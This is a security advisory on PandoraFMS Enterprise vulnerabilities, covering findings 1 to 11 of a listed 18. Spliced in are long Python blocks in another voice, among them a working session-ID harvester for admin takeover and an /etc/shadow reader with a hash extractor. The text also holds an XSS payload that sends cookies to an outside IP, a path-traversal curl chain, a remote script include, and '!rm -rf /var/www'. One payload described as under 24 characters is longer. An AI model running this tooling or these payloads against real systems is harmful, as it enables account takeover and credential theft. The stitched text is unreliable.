
Technical Advisory – Multiple Vulnerabilities in PandoraFMS Enterprise

02 January 2024

By Oliver Brooks

Introduction

This is the third Technical Advisory post in a series wherein I audit the security of popular Remote Monitoring and Management (RMM) tools. The first post in the series can be found at Multiple Vulnerabilities in Faronics Insight, the second post can be found at Multiple Vulnerabilities in Nagios XI.

In this post I describe the 18 vulnerabilities that I discovered in PandoraFMS Enterprise v7.0NG.767 available at https://pandorafms.com. PandoraFMS is an enterprise scale network monitoring and management application which provides systems administrators with a central ‘hub’ to monitor and manipulate the state of computers (agents) deployed across the network.

The PandoraFMS Console (server) boasts a large feature set which includes the ability to execute arbitrary commands on agent computers, monitor processes on agents, monitor CPU load, interact via SNMP, and enables direct SSH/telnet connections to agents via a rich, bespoke in-browser client.

During this research a number of vulnerabilities were identified in the product:

  1. Unauthenticated Admin Account Takeover Via Cron Log File Backups (CVE-2023-4677)
  2. Database Backups are Available to Any User (CVE-2023-41786)
  3. Remote Code Execution via MIBS file uploader (CVE-2023-41788)
  4. Unauthenticated Admin Account Takeover Via Malicious Agent and XSS (CVE-2023-41789)
  5. Arbitrary File Read As Root Via GoTTY Page (CVE-2023-41808)
  6. Arbitrary File Read Via API Checker (CVE-2023-41787)
  7. Linux Local Privilege Escalation Via GoTTY Page (CVE-2023-41807)
  8. Path Traversal in get_file.php (CVE-2023-41790)
  9. Stored Cross Site Scripting via SNMP Trap Editor Page (CVE-2023-41792)
  10. Stored Cross Site Scripting via Translation Abuse (CVE-2023-41791)
  11. Stored Cross Site Scripting via User Profile Comment Field (CVE-2023-41809)
  12. System Denial of Service Via GoTTY Page (CVE-2023-41806)
  13. Any User Can Change Any Other User’s Notification Settings (CVE-2023-41813)
  14. Cookies Set Without HTTP ONLY Flag (CVE-2023-41793)
  15. Installer installs MySQL with Weak Credentials (Not assigned)
  16. Stored Cross Site Scripting Via Dashboard Panel (CVE-2023-41810)
  17. Stored Cross Site Scripting via Site News Page (CVE-2023-41811)
  18. User Credentials Written To Access Log In Plaintext (CVE-2023-41794)

N.B: Despite the findings which were identified during this research, generally speaking, the security posture of the application is mature, and significant effort has been made to mitigate impactful vulnerabilities like SQL injection, IDOR and LFI. Additionally the RBAC controls are generally implemented consistently across the application, to a sufficiently granular degree.

These vulnerabilities were all mitigated across versions v773, v774 and v775 (the latest version at the time of writing).

1. Unauthenticated Admin Account Takeover Via Cron Log File Backups (CVE-2023-4677)

Risk: Critical (9.9 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)

Impact

Successful compromise of an administrator’s account generally grants an attacker the ability to execute arbitrary commands on all connected agents, leading to mass compromise.

Details

As part of the Pandora FMS server’s operation it periodically executes a Linux ‘cron’ job and stores logs of the job’s execution in `/var/www/html/pandora_console/logs/cron.log` by default. This log file is periodically rotated by compressing it into a gzip archive stored under a name of the form `cron.log.date_of_backup.gz`.

Pandora developers have implemented an Apache `.htaccess` file which explicitly blocks browsers from requesting the `cron.log` file, however an oversight in this `.htaccess` file enables an attacker to retrieve all backups by brute forcing the date portion of the backup filename.

Amongst other sensitive details, these cron log files contain the administrator’s session ID at the time that the cron log was written. Should an attacker successfully access a cron log file then they are able to extract admin’s session ID and connect to Pandora FMS as an administrator, taking over the admin’s account.

A small Python proof of concept script was written which automatically attempts to retrieve cron log backup files from “today’s date+1” backwards, extracts the session ID and establishes whether it’s valid or not by requesting the admin’s user profile page whilst supplying the extracted session ID.
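The harvesting loop described above, reconstructed here as an added example that is not the advisory’s own PoC. It walks candidate backup names from tomorrow’s date backwards, decompresses each hit, pulls session IDs out of the text and stops at the first one a validation callback accepts. The date layout (`YYYY-MM-DD`) and the `PHPSESSID=` line format are assumptions, since the advisory only gives the `cron.log.date_of_backup.gz` pattern; the fetch and validation callbacks are injected so the same logic runs here against constructed data without touching a real host.

```python
import gzip
import re
from datetime import date, timedelta
from urllib.parse import urljoin

# ASSUMPTION: rotated backups are named cron.log.YYYY-MM-DD.gz. The advisory only
# gives the pattern cron.log.date_of_backup.gz, so adjust DATE_FMT if the real
# rotation uses another date layout.
LOG_DIR = "/pandora_console/logs/"
DATE_FMT = "%Y-%m-%d"

# ASSUMPTION: the log carries the session ID as PHPSESSID=<id>. PHP session IDs
# use the characters [A-Za-z0-9,-]; the minimum length just filters noise.
SESSION_RE = re.compile(r"PHPSESSID=([A-Za-z0-9,-]{22,})")


def candidate_urls(base, days_back, today=None):
    """Backup URLs from tomorrow's date backwards, the order the advisory's PoC used."""
    today = date.fromisoformat(today) if today else date.today()
    for offset in range(-1, days_back):
        day = today - timedelta(days=offset)
        name = "cron.log." + day.strftime(DATE_FMT) + ".gz"
        yield urljoin(base, LOG_DIR + name)


def extract_session_ids(gz_bytes):
    """Decompress one rotated backup and return the session IDs it leaks, de-duplicated, in order."""
    try:
        text = gzip.decompress(gz_bytes).decode("utf-8", errors="replace")
    except (OSError, EOFError):
        return []  # not a gzip member (e.g. an HTML 404 body); ignore it
    return list(dict.fromkeys(SESSION_RE.findall(text)))


def harvest(fetch, is_valid, base, days_back, today=None):
    """Walk candidate backups, pull session IDs, return (url, sid) for the first that still works.

    fetch(url) -> bytes or None; is_valid(sid) -> bool. Both are injected so the
    same loop can be driven by an HTTP client in the field or by canned data here.
    """
    for url in candidate_urls(base, days_back, today):
        body = fetch(url)
        if body is None:
            continue
        for sid in extract_session_ids(body):
            if is_valid(sid):
                return url, sid
    return None


# --- constructed offline demo: no Pandora FMS host is contacted -------------

SAMPLE_SID = "3l5il2emlt4j4j4v03k6g1aq0u"  # constructed; same shape as the ID in the advisory


def build_sample_backup():
    """A constructed cron.log backup containing one leaked session ID."""
    log = (
        "2023-08-01 03:00:01 Starting cron jobs\n"
        "2023-08-01 03:00:01 Running as admin with PHPSESSID=" + SAMPLE_SID + "\n"
        "2023-08-01 03:00:02 Finished\n"
    )
    return gzip.compress(log.encode())


def demo():
    """Drive harvest() against canned responses where only the 2023-08-01 backup exists."""
    base = "http://pandora.example.test"  # hypothetical host
    canned = {urljoin(base, LOG_DIR + "cron.log.2023-08-01.gz"): build_sample_backup()}
    return harvest(canned.get, lambda sid: sid == SAMPLE_SID, base, days_back=7, today="2023-08-03")


if __name__ == "__main__":
    print(demo())
```

In the field, `fetch` would be a function that issues the GET and returns the body only on a 200, and `is_valid` would request a page that only renders for a logged-in user while sending the candidate ID as the `PHPSESSID` cookie; the `.htaccess` gap means the server never asks for credentials on any of these requests.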

An image showing successful account takeover by abusing the exposed cron logs.

2. Database Backups are Available to Any User (CVE-2023-41786)

Risk: High (7.7 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Impact

Exploitation of this vulnerability enables compromise of all connected agents, all Pandora FMS users with weak credentials and full compromise of the Pandora FMS database.

Details

The Pandora FMS server allows administrators to schedule database backups to be created on a configurable basis, this functionality is not available to low privileged users.

These backups are persisted in `/var/www/html/pandora_server/attachment/backups` with a reasonably robust naming convention (`backup_pseudorand_date_time.sql.gz`). A list of all active database backups and links to download them is available to any authenticated user at:

http://SERVER_IP/pandora_console/index.php?sec=gextensions&sec2=enterprise/godmode/manage_backups

Because this functionality is available to any authenticated user, including low privileged ‘read only’ users, database backup files can be downloaded by a low privileged attacker. The database backups contain a variety of interesting information including –

  • Credentials for all users (MD5 hashed)
  • Credentials for the internal user and API users (plaintext)
  • Credentials for all deployed agent infrastructure (plaintext by default)
  • Configuration details for all deployed agent infrastructure
  • Configuration details for the Pandora FMS application (including numerous plaintext passwords in the `tconfig` table)

It is also noteworthy that the backup files can be downloaded directly by an unauthenticated user if they have knowledge of the database backup filenames, however due to the pseudorandom element of the name along with the additional entropy that the datetime provides it is unlikely that this will be exploited.

3. Remote Code Execution via MIBS file uploader (CVE-2023-41788)

Risk: High (7.6 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N)

Impact

Due to the ability to read configuration files and connect directly to the database, code execution on the Pandora FMS server constitutes a complete compromise of all accounts and agents registered with the server.

Details

Pandora FMS allows administrators to upload SNMP MIBS files at `/pandora_console/index.php?sec=snmpconsole&sec2=operation/snmpconsole/snmp_mib_uploader`. Uploaded files are persisted at `/var/www/html/pandora_console/attachment/mibs/` and are therefore accessible over HTTP by any unauthenticated user on the network.

During this vulnerability research it was observed that it is possible to upload PHP files without restriction to the SNMP MIBS uploader, and these files would become accessible at http://host/pandora_console/attachment/mibs/XYZ.php, where XYZ.php is the name of the uploaded file.

NCC Group researchers were able to abuse this flaw to upload a web shell to the server and fully compromise the Pandora FMS server.
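One server-side check that would have stopped this upload, written as an added example rather than Pandora FMS code (the console itself is PHP; this is a Python rendering of the same rule). The allowed extension set is an assumption, since the advisory does not state what the MIB uploader expects. The point worth noting is the single-extension rule: Apache’s mod_mime evaluates every extension in a name, so when PHP is wired up with `AddHandler`, `shell.php.mib` can still run as PHP even though its last extension looks harmless.

```python
import posixpath
import re

# ASSUMPTION: a MIB uploader only ever needs plain-text MIB modules; the
# advisory does not list which extensions Pandora FMS itself accepts.
ALLOWED_EXT = {".mib", ".txt", ".my"}
# Stem: leading alphanumeric, then a conservative set, bounded length, no dots.
STEM_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,127}")


def safe_upload_name(client_supplied):
    """Return a filename safe to write under attachment/mibs/, or raise ValueError.

    Rules, in order: drop any directory component (the client-supplied name is
    untrusted), require exactly one extension from the allowlist, and allow only
    a conservative character set in the stem. Forbidding dots in the stem is what
    rules out 'shell.php.mib', which mod_mime may still hand to the PHP handler.
    """
    name = posixpath.basename(client_supplied.replace("\\", "/"))
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    stem, ext = posixpath.splitext(name)
    if ext.lower() not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    if not STEM_RE.fullmatch(stem):
        raise ValueError(f"unsafe stem {stem!r}")
    return stem + ext.lower()


def is_accepted(client_supplied):
    """Convenience wrapper: True if the name would be stored, False if rejected."""
    try:
        safe_upload_name(client_supplied)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for candidate in ["IF-MIB.mib", "../../../shell.MIB", "shell.php", "shell.php.mib", ".htaccess"]:
        print(f"{candidate!r}: {'accepted' if is_accepted(candidate) else 'rejected'}")
```

Filename validation is the first layer, not the only one: the upload directory should also have script execution disabled at the web-server level (for example `php_flag engine off` or a `RemoveHandler` in that directory), so that even a filter bypass yields a file Apache will serve as bytes rather than execute.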

4. Unauthenticated Admin Account Takeover Via Malicious Agent and XSS (CVE-2023-41789)

Risk: High (8.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)

Impact

Successful compromise of an administrator’s account generally grants an attacker the ability to execute arbitrary commands on all connected agents, leading to mass compromise.

Details

In the default Pandora FMS configuration, the mechanism for new agents to connect to the server is a very simple XML-based protocol. Agents send a large XML payload to the server containing various pieces of information about the agent host machine, and upon receipt of this payload the server will consider them to be “connected”. A legitimate agent will send XML payloads every 5 minutes by default for the server to get up-to-date information on the agent’s state.

Due to the relative simplicity of this agent connection protocol, it is possible for an attacker to create artificial “agents” by submitting arbitrary XML payloads to the server. While fuzzing the agent connection protocol, a stored Cross Site Scripting vulnerability was discovered on the ‘custom ID’ field of the agent details page, enabling an attacker to submit a malicious XML payload as an unauthenticated user and gain JavaScript execution in an administrator’s browser when the administrator next views the agent details page.

A basic proof-of-concept Python script was developed which can perform these steps automatically, sending the administrator’s session ID back to the attacker –

An image showing successful account takeover by abusing the weak agent connection protocol and a stored XSS.

5. Arbitrary File Read As Root Via GoTTY Page (CVE-2023-41808)

Risk: Medium (7.1 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)

Impact

Abuse of this flaw enables an attacker to retrieve privileged data from the host, including password hashes from `/etc/shadow`. Given enough time and computing power, password hashes can sometimes be ‘cracked’ to recover the corresponding passwords, which could then enable full privilege escalation on the host.

Details

The Pandora FMS Console deploys a bespoke webservice named GoTTY on http://localhost:8081. During this research it was observed that this acts as an SSH client, enabling Windows or Linux users on the Pandora server host to connect to arbitrary remote hosts over SSH via their web browser. This is a full and unrestricted SSH client.

The service accepts any number of URL parameters named ‘arg’ which are passed directly as command line arguments to the SSH client when it starts.

One command line argument supported by the underlying `SSH` client is the `configfile` argument (`-F`), supplying this argument along with a file path will cause SSH to attempt to read the file and, upon failing to read configuration data from the file, print the contents of the file to the user.

Because the GoTTY service runs as root, it is possible to read any protected file on the filesystem as a low privileged user. For example, simply navigating to the URL `http://localhost:8081/?arg=-F&arg=/etc/shadow&arg=localhost` will cause the application to print the contents of the /etc/shadow file to the screen –

/etc/shadow: line 1: Bad configuration option: root:$6$e7ffqyh.8wh9zidg$cr7ufucqlcjrdv5k/y.oslcsmdhniixiuhyva9dswjhkkdsci4v6ipicbobxlz0nzyxp92fxdpksv4pfzebem.::0:99999:7:::
/etc/shadow: line 2: Bad configuration option: bin:*:19326:0:99999:7:::
/etc/shadow: line 3: Bad configuration option: daemon:*:19326:0:99999:7:::
/etc/shadow: line 4: Bad configuration option: adm:*:19326:0:99999:7:::
/etc/shadow: line 46: Bad configuration option: nginx:!!:19516::::::
/etc/shadow: line 47: Bad configuration option: apache:!!:19516::::::
/etc/shadow: line 48: Bad configuration option: mysql:!!:19516::::::
/etc/shadow: line 49: Bad configuration option: postfix:!!:19516::::::
/etc/shadow: line 50: Bad configuration option: pandora:!!:19516:0:99999:7:::

This could then be abused to attempt to brute force the root user’s password hash offline. Another example of abusing this flaw would be to steal every user’s SSH private key file by requesting `/username/.ssh/id_rsa`
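The two mechanical steps above (building the `arg` URL and turning ssh’s complaints back into a file) as an added example; this is not the advisory’s tooling. The sample output is constructed in the shape the advisory reproduces, including the final `terminating` line ssh prints after a bad config file. Because ssh only echoes the first whitespace-delimited token of each rejected line and silently accepts blank lines, comments and any line whose first token is a real keyword, the recovered file is keyed by line number and gaps are left visible rather than filled with empty strings.

```python
import re
from urllib.parse import urlencode

GOTTY_BASE = "http://localhost:8081/"


def gotty_read_url(path, host="localhost"):
    """URL that makes the GoTTY-wrapped ssh client load `path` as its -F config file.

    Each repeated 'arg' parameter becomes one argv entry, so the client runs
    roughly: ssh -F <path> <host>
    """
    return GOTTY_BASE + "?" + urlencode([("arg", "-F"), ("arg", path), ("arg", host)])


# ssh reports each unparseable config line as
#   <file>: line <n>: Bad configuration option: <first token of the line>
# Only the first whitespace-delimited token is echoed, which is why a file with
# no spaces in it (such as /etc/shadow) leaks verbatim.
BAD_OPTION_RE = re.compile(
    r"^(?P<file>.+?):? line (?P<no>\d+): Bad configuration option: (?P<token>.*)$"
)


def recover_file(ssh_output):
    """Rebuild {line_number: token} from ssh's complaints.

    Line numbers that never appear were accepted silently (blank lines, '#'
    comments, or a first token that happens to be a valid ssh keyword); treat
    those gaps as unknown content, not as empty lines.
    """
    lines = {}
    for raw in ssh_output.splitlines():
        m = BAD_OPTION_RE.match(raw.strip())
        if m:
            lines[int(m.group("no"))] = m.group("token")
    return lines


def shadow_hashes(lines):
    """From recovered /etc/shadow lines keep only accounts with a crackable hash.

    A second field of '*', '!', '!!' or '' marks a locked or passwordless
    account and is skipped; what remains can go straight to an offline cracker.
    """
    hashes = {}
    for token in lines.values():
        fields = token.split(":")
        if len(fields) >= 2 and fields[1].startswith("$"):
            hashes[fields[0]] = fields[1]
    return hashes


# Constructed sample in the shape the advisory reproduces (subset of lines).
SAMPLE_OUTPUT = """\
/etc/shadow: line 1: Bad configuration option: root:$6$e7ffqyh.8wh9zidg$cr7ufucqlcjrdv5k/y.oslcsmdhniixiuhyva9dswjhkkdsci4v6ipicbobxlz0nzyxp92fxdpksv4pfzebem.::0:99999:7:::
/etc/shadow: line 2: Bad configuration option: bin:*:19326:0:99999:7:::
/etc/shadow: line 3: Bad configuration option: daemon:*:19326:0:99999:7:::
/etc/shadow: line 47: Bad configuration option: apache:!!:19516::::::
/etc/shadow: line 50: Bad configuration option: pandora:!!:19516:0:99999:7:::
/etc/shadow: terminating, 5 bad configuration options
"""

if __name__ == "__main__":
    print(gotty_read_url("/etc/shadow"))
    print(shadow_hashes(recover_file(SAMPLE_OUTPUT)))
```

The same first-token limitation is why an SSH private key leaks almost intact through this channel: the base64 body lines contain no whitespace, and only the `-----BEGIN ... KEY-----` header and footer lines come back truncated.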

This is especially concerning as no authentication or authorization are required to interact with this service in the default configuration.

This vulnerability is partly mitigated by the service being bound to localhost only; had it been reachable by network-adjacent users, it would have been rated critical.

6. Arbitrary File Read Via API Checker (CVE-2023-41787)

Risk: Medium (4.4 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

Impact

Arbitrary file read as the Apache user enables an attacker to read every file under (at least) `/var/www/html/pandora_console` and any other file that the Apache user can read.

Details

The Pandora application exposes a page at `/pandora_console/index.php?extension_in_menu=gextensions&sec=gextensions&sec2=extensions/api_checker` which enables an administrator to test if a custom Pandora FMS API endpoint is responding correctly. The intention is that an administrator will supply a HTTP/HTTPS URL in the Custom URL field and the web server will make a call to the URL, printing the response.

During this vulnerability research it was observed that it is possible to supply other URL schemes in this field too, including `file://`. Supplying a Custom URL of `file:///etc/passwd` caused the web server to print the host’s passwd file to the screen.

The screenshot below demonstrates an attacker obtaining the config file using this mechanism:

An image showing successful exfiltration of the Pandora config file by abusing a LFI vulnerability.

This finding’s severity is significantly mitigated by the fact that this page is only available to administrative users.

7. Linux Local Privilege Escalation Via GoTTY Page (CVE-2023-41807)

Risk: Medium (9.3 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Despite this high CVSS score, exploitation is unlikely, and as such the risk has been lowered to medium.

Impact

Privilege escalation to the root user enables an attacker to fully enumerate and compromise the server without any limitations.

Details

The Pandora FMS Console deploys a bespoke webservice named GoTTY on http://localhost:8082. During this research it was observed that this acts as a telnet client, enabling local operating system users on the Pandora server to connect to remote Telnet servers via their web browser. This is a full and unrestricted Telnet client, and as such it supports the dangerous “!” `invoke subshell` command.

Invoking a subshell allows a user to execute commands on the telnet client’s host by prepending them with the exclamation mark character (!ls, !whoami, !rm -rf /var/www). Because the GoTTY webservice runs as the root user, invoking a subshell allows anyone on localhost (or with access to localhost) to execute commands on the host as root; this constitutes a full privilege escalation on the host.

It should be noted that no authentication or authorization are required to interact with this service in the default configuration.

This vulnerability is partly mitigated by the service being bound to localhost only; had it been reachable by network-adjacent users, it would have been rated critical.

8. Path Traversal in get_file.php (CVE-2023-41790)

Risk: Medium (6.3 CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N)

Impact

Exploitation of this finding enables an attacker to exfiltrate the contents of the Pandora FMS config file, potentially enabling them to fully compromise the database.

Details

`get_file.php` is a PHP script available to authenticated users. Its purpose is to serve a subset of files from the ‘file_manager’ page of the Pandora FMS Console. To prevent arbitrary file reads, the `get_file.php` script accepts two arguments –

  • `file` – a base64 encoded representation of the filename to be downloaded
  • `hash` – the MD5 digest of the `file` parameter concatenated with a secret key (`server_unique_identifier`) stored in the `tconfig` table of the database.

The intention behind this security scheme is that an attacker shouldn’t know the `server_unique_identifier` value which is stored in the database, so they should never be able to manually request files which aren’t listed in the file manager page of the application.

Whilst researching Pandora FMS it was observed that if an attacker does become aware of the `server_unique_identifier` value, they are able to request arbitrary files. Here is an example of an attacker stealing the application’s config file by abusing path traversal –

FILE=$(echo -n "../../../../../../../../var/www/html/pandora_console/include/config.inc.php" | base64 -w0)
HASH=$(echo -n "${FILE}2d4db6e6061b11eea83f000c295d5470" | md5sum | cut -f1 -d' ')
URL="http://127.0.0.1/pandora_console/include/get_file.php?file=$FILE&hash=$HASH"
curl "$URL" -H 'Cookie: PHPSESSID=3l5il2emlt4j4j4v03k6g1aq0u'
<?php

/** *
 * @category   Config
 * @package    Pandora FMS
 * @subpackage Community
.......... SNIP

Numerous mechanisms have been described in this package of technical advisories which could enable an attacker to ascertain the `server_unique_identifier` value (exposed database backups, weak default MySQL credentials, admin account takeover, etc.) which leads NCC Group researchers to believe that this is a credible attack vector.
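The signature scheme described above, with the original check beside a hardened one, as an added example that is not Pandora FMS code (the console is PHP; this is a Python rendering of the logic). `sign_request` produces the same `file`/`hash` pair the shell commands above do, using the advisory’s example secret; `BASE_DIR` is an assumed attachment directory. The hardened version keeps the hash check but no longer treats it as the only gate: the decoded path is normalised and must still live under the base directory, because anyone who has obtained the secret can sign any path they like.

```python
import base64
import hashlib
import hmac
import posixpath

SECRET = "2d4db6e6061b11eea83f000c295d5470"  # the advisory's example server_unique_identifier
BASE_DIR = "/var/www/html/pandora_console/attachment"  # ASSUMPTION: directory the file manager serves


def sign_request(filename, secret=SECRET):
    """file/hash pair as get_file.php expects: base64(name) and md5(base64(name) + secret)."""
    file_param = base64.b64encode(filename.encode()).decode()
    hash_param = hashlib.md5((file_param + secret).encode()).hexdigest()
    return file_param, hash_param


def _hash_ok(file_param, hash_param, secret):
    expected = hashlib.md5((file_param + secret).encode()).hexdigest()
    return hmac.compare_digest(expected, hash_param.lower())


def resolve_vulnerable(file_param, hash_param, secret=SECRET, base_dir=BASE_DIR):
    """Mirror of the original logic: a valid hash is the only gate and the decoded
    path is joined and served as-is, so '../' sequences walk out of base_dir."""
    if not _hash_ok(file_param, hash_param, secret):
        return None
    rel = base64.b64decode(file_param).decode()
    return posixpath.normpath(posixpath.join(base_dir, rel))


def resolve_hardened(file_param, hash_param, secret=SECRET, base_dir=BASE_DIR):
    """Check the hash, then prove the normalised path still lives under base_dir."""
    if not _hash_ok(file_param, hash_param, secret):
        return None
    try:
        rel = base64.b64decode(file_param, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    if "\x00" in rel or posixpath.isabs(rel):
        return None
    full = posixpath.normpath(posixpath.join(base_dir, rel))
    # commonpath rather than startswith: '/var/www/.../attachment_evil' would pass a prefix test
    if posixpath.commonpath([base_dir, full]) != base_dir:
        return None
    # On a live server also compare os.path.realpath() of both sides so that a
    # symlink planted inside base_dir cannot point back out of it.
    return full


if __name__ == "__main__":
    evil = "../../../../../../../../var/www/html/pandora_console/include/config.inc.php"
    fp, h = sign_request(evil)
    print("vulnerable serves:", resolve_vulnerable(fp, h))
    print("hardened serves:  ", resolve_hardened(fp, h))
```

The secret is still worth keeping secret, since it is what stops users requesting files the file manager never listed, but after this change its disclosure costs you the listed files only, not `config.inc.php`.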

9. Stored Cross Site Scripting via SNMP Trap Editor Page (CVE-2023-41792)

Risk: Medium (7.6 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:L)

Impact

Consequences of an exploited stored Cross Site Scripting vulnerability generally range from site defacement and account takeover to CSRF and sophisticated phishing attacks.

Details

Two key flaws were identified in the Pandora FMS console. Firstly, there is an RBAC lapse on the SNMP Trap editor page which enables any authenticated user to create SNMP Trap entries (it is assumed that this is intended to be an administrator-only feature).

Secondly there is no output encoding on the OID/text/description fields in the SNMP Trap list page, leading to a situation where a low privileged attacker can create malicious SNMP Trap entries containing JavaScript code which executes whenever a victim visits the SNMP Trap list page.

10. Stored Cross Site Scripting via Translation Abuse (CVE-2023-41791)

Risk: Medium (6.5 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Impact

Consequences of an exploited stored Cross Site Scripting vulnerability generally range from site defacement and account takeover to CSRF and sophisticated phishing attacks.

Details

The application makes a feature available to administrators which allows them to tweak the translation of various application strings so that they read more naturally in the user’s native language.

There are two key issues here. The first issue is that the feature is erroneously accessible as a non-administrator user (this is clearly intended to be an administrative feature). The second issue is that there is insufficient filtering on the supplied translation strings, which enables stored XSS by changing the strings to JavaScript payloads.

As an example, replace the “Enter keywords to search” string (a string which renders at the top of every single page in the application) with

'test'; ?><script>var i=new Image; i.src='http://192.168.120.128:8888/?'+document.cookie;</script><>

After this change is made, any time that a user navigates to any page in the application, their cookies will be exfiltrated to the IP address noted above –

An image showing successful exfiltration of admin

11. Stored Cross Site Scripting Via User Profile Comment Field (CVE-2023-41809)

Risk: Medium (6.5 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Impact

Consequences of an exploited stored Cross Site Scripting vulnerability generally range from site defacement and account takeover to CSRF and sophisticated phishing attacks.

Details

The application allows users to supply comments about themselves in their profile, no special permissions are required for this. A snippet of this comment is rendered to administrators in the `Users` screen at:

http://pandora_server_hostname/pandora_console/index.php?sec=gusuarios&sec2=godmode/users/user_list#

If the comment exceeds 24 characters in length it is truncated to 24 characters and an ellipsis is appended. An XSS vulnerability exists in this comment field, exploitable with a sub-24-character payload such as the following –

<script src="//nc.ci/1"></script>

Oliver Brooks

Principal Security Consultant working with NCC Group in Canada.